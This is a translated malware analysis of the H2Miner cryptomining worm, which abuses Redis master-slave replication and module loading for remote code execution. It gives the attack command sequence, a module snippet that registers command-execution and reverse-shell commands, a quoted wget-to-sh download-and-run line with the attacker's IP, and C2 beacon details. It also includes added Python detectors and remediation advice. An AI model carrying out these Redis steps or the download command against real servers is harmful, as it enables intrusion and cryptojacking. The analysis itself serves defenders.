A new H2Miner worm outbreak exploiting Redis RCE has been discovered

A day ago, one of my servers was attacked by this worm. While searching for an answer to the question "what is that?", I found a great article by the Alibaba Cloud Security team. Since I did not find this article on Habr, I decided to translate it especially for you <3

Introduction

Recently, the Alibaba Cloud security team discovered a sudden outbreak of H2Miner. This malicious worm uses missing authorization or weak passwords on Redis as its gateway into your systems; it then synchronizes its malicious module to the victim through master-slave replication, so that the module is written to the attacked machine, and finally loads it and executes malicious commands.

Previously, attacks on your systems used a method that relied on scheduled tasks or SSH keys written to your machine after the attacker had logged into Redis. Fortunately, that method often fails because of permission control or differences between system versions. The malicious module-loading method, however, can execute the attacker's commands directly or obtain a shell, which makes it far more dangerous for your system.

Because of the large number of Redis servers exposed on the Internet (almost 1 million), the Alibaba Cloud security team, as a friendly reminder, recommends that users do not expose Redis online and that they regularly check the strength of their passwords and whether they could be compromised by quick brute-force guessing.

H2Miner

H2Miner is a cryptomining botnet for Linux-based systems that can invade your system in several ways, including missing authorization in Hadoop YARN and Docker and the Redis remote command execution (RCE) vulnerability. The botnet works by downloading malicious scripts and malware for cryptomining, spreading the attack laterally, and maintaining command and control (C&C) communication.

Redis RCE

Knowledge of this issue was shared by Pavel Toporkov at ZeroNights 2018. Since version 4.0, Redis supports a module-loading feature that lets users load files compiled from C into Redis as modules in order to execute specific Redis commands. This feature, although useful, contains a vulnerability: in master-slave mode, files can be synchronized to the slave through full resync mode. An attacker can use this to transfer malicious files. Once the transfer is complete, the attacker loads the module on the attacked Redis instance and executes arbitrary commands.

Malware worm analysis

Recently, the Alibaba Cloud security team discovered that the size of the H2Miner mining group had grown suddenly. According to the investigation, the overall process of the attack is as follows:


H2Miner uses Redis RCE for the full attack. The attackers first target unprotected Redis servers or servers with weak passwords.

They then use the command config set dbfilename red2.so to change the dump file name. After that, the attackers execute the slaveof command to set the address of the master host.

When the attacked Redis instance establishes a master-slave connection with the malicious Redis owned by the attacker, the attacker sends the infected module using the fullresync file-synchronization command. The red2.so file is written to the attacked machine. The attackers then use module load ./red2.so to load this file. The module can execute commands from the attacker or open a reverse connection (backdoor) to gain access to the attacked machine.

// Inside the module's RedisModule_OnLoad: registers two custom commands,
// system.exec (run a command) and system.rev (reverse shell).
if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;

After executing a malicious command such as /bin/sh -c wget -q -O- http://195.3.146.118/unk.sh | sh >/dev/null 2>&1, the attacker resets the dump file name and unloads the system module to clean up traces. However, the red2.so file remains on the attacked machine. Users are advised to watch for the presence of such a suspicious file in the working directory of their Redis instance.
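As an added defensive example (not part of the original article or Alibaba's analysis), the following Python parses redis-cli MONITOR output and flags clients that perform the dbfilename / SLAVEOF / MODULE LOAD sequence described above. The sample lines, client addresses and the check for system.* commands are constructed from the article's description.

```python
import re
from collections import defaultdict

# Constructed sample of `redis-cli MONITOR` output (timestamps and client
# addresses are invented); the command sequence is the one the article describes.
SAMPLE_MONITOR = """\
1581500000.101 [0 10.0.0.5:41122] "GET" "session:42"
1581500001.210 [0 203.0.113.7:50114] "CONFIG" "SET" "dbfilename" "red2.so"
1581500001.320 [0 203.0.113.7:50114] "SLAVEOF" "203.0.113.7" "6379"
1581500004.990 [0 203.0.113.7:50114] "MODULE" "LOAD" "./red2.so"
1581500005.100 [0 203.0.113.7:50114] "system.exec" "id"
1581500006.000 [0 10.0.0.5:41122] "SLAVEOF" "NO" "ONE"
"""

LINE_RE = re.compile(r'^(\d+\.\d+) \[\d+ ([^\]]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

def parse_monitor_line(line):
    """Split one MONITOR line into (timestamp, client, [command args]) or None."""
    m = LINE_RE.match(line.strip())
    return (m.group(1), m.group(2), ARG_RE.findall(m.group(3))) if m else None

def stage_of(args):
    """Map a command to the attack stage it belongs to, or None if unremarkable."""
    cmd = [a.lower() for a in args]
    if not cmd:
        return None
    if cmd[:3] == ['config', 'set', 'dbfilename'] and len(cmd) > 3 and cmd[3].endswith('.so'):
        return 'dbfilename_so'      # RDB dump file renamed to a shared object
    if cmd[0] in ('slaveof', 'replicaof') and cmd[1:2] != ['no']:
        return 'slaveof'            # instance pointed at a foreign master
    if cmd[:2] == ['module', 'load']:
        return 'module_load'        # the synced .so is loaded as a module
    if cmd[0].startswith('system.'):
        return 'custom_command'     # commands the rogue module registers
    return None

def detect_module_rce(monitor_text):
    """Return {client: [stages...]} for every client that hit at least one stage."""
    stages = defaultdict(list)
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        stage = stage_of(parsed[2]) if parsed else None
        if stage:
            stages[parsed[1]].append(stage)
    return dict(stages)

def full_chain(stages):
    """True when a client performed all three steps needed to load a module."""
    return {'dbfilename_so', 'slaveof', 'module_load'} <= set(stages)
```

In production, feed the same parser from a MONITOR session or a proxy log rather than the embedded sample; a single client completing full_chain is a strong signal even before any system.* command appears.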

In addition to killing other malicious processes in order to seize resources, the attacker's malicious script continues by downloading and executing binaries from 142.44.191.122. This means that a process name or directory name containing "kinsing" may indicate that the machine is infected with this worm.

According to the results of reverse engineering, the malware performs the following functions:

  • Downloading and executing files
  • Mining
  • Maintaining C&C communication and executing the attackers' commands


It uses masscan for external scanning to spread further. In addition, the C&C server's IP address is hard-coded in the program, and the victim communicates with the C&C server using HTTP requests, with the zombie's (compromised server's) information reported in the HTTP headers.


GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
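As an added example, not from the original article, this Python checks a raw HTTP request for the non-standard host-profile headers seen in the beacon above. The beacon sample reproduces the article's request with a placeholder UUID, the browser request is constructed for contrast, and the min_hits threshold is an assumption.

```python
# Constructed HTTP beacon modelled on the request shown in the article, plus an
# ordinary browser request for contrast. The UUID is a placeholder.
BEACON = (
    "GET /h HTTP/1.1\r\n"
    "Host: 91.215.169.111\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Arch: amd64\r\nCores: 2\r\nMem: 3944\r\nOs: linux\r\nOsname: debian\r\n"
    "Osversion: 10.0\r\nRoot: false\r\nS: k\r\n"
    "Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\r\nVersion: 26\r\nAccept-Encoding: gzip\r\n\r\n"
)
BROWSER = (
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Accept: text/html\r\nAccept-Encoding: gzip\r\n\r\n"
)

# Non-standard headers the bot uses to describe the infected host.
BEACON_HEADERS = {'arch', 'cores', 'mem', 'os', 'osname', 'osversion', 'root', 'uuid', 'version'}

def parse_request(raw):
    """Parse the request line and headers of a raw HTTP/1.x request."""
    head = raw.split('\r\n\r\n', 1)[0]
    lines = head.split('\r\n')
    method, path, version = lines[0].split(' ', 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def classify_beacon(raw, min_hits=5):
    """Return a host-profile dict if the request looks like an H2Miner check-in, else None."""
    method, path, headers = parse_request(raw)
    hits = BEACON_HEADERS & set(headers)
    if len(hits) < min_hits:
        return None
    ua = headers.get('user-agent', '').lower()
    return {
        'c2': headers.get('host'),
        'path': path,
        'uuid': headers.get('uuid'),
        'root': headers.get('root', '').lower() == 'true',
        'os': f"{headers.get('osname')} {headers.get('osversion')}",
        # a desktop Windows browser UA claiming a Linux OS is itself a mismatch
        'ua_mismatch': 'windows' in ua and headers.get('os') == 'linux',
        'matched_headers': sorted(hits),
    }
```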

Other attack methods


Addresses and links used by the worm


Recommendations

First, Redis should not be reachable from the Internet and should be protected with a strong password. It is also important that customers check that there is no red2.so file in the Redis directory and no "kinsing" in any file or process name on the host.

source: www.habr.com
